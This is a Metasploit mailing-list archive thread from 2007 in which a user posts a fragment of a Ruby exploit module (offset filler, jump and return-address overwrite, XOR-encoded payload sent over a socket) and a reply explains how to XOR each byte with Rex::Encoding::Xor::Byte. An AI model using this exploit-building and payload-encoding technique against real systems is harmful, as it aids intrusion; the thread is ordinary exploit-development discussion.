Metasploit mailing list archives
Need assistance with payload xor
From: mmiller at hick.org (mmiller at hick.org)
Date: Wed, 28 Mar 2007 23:29:32 -0700
On Wed, Mar 28, 2007 at 12:52:21PM -0500, ri0t wrote:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 filler = rand_text_english(1) * (target['Offset']) jump = [0xeb06eb06].pack("V") retadd = [target.ret].pack('V') buffer=jump+retadd+payload.encoded buffercoded= xor.encode(buffer, [0xb3].pack("V")) sploit = header + filler + buffercoded[0] sock.put(sploit) handler disconnect end unfortunatly the xor.encode only xor's the first byte of jump retadd and payload not the entire buffer. I am sure its something i am missing due to a simple lack of ruby knowledge but if anyone could point me in the right direction i would be greatful
Since you're using the Generic XOR, it defaults to using the size of the key as the block size for encoding. I'm guessing what you actually want to do is XOR each individual byte with 0xb3. To do this you should use Rex::Encoding::Xor::Byte. Make sure you use [0xb3].pack("C"). I think this should give you the results you're looking for. If it's still not working let us know.
Current thread:
- Need assistance with payload xor ri0t (Mar 28)
- Need assistance with payload xor mmiller at hick.org (Mar 28)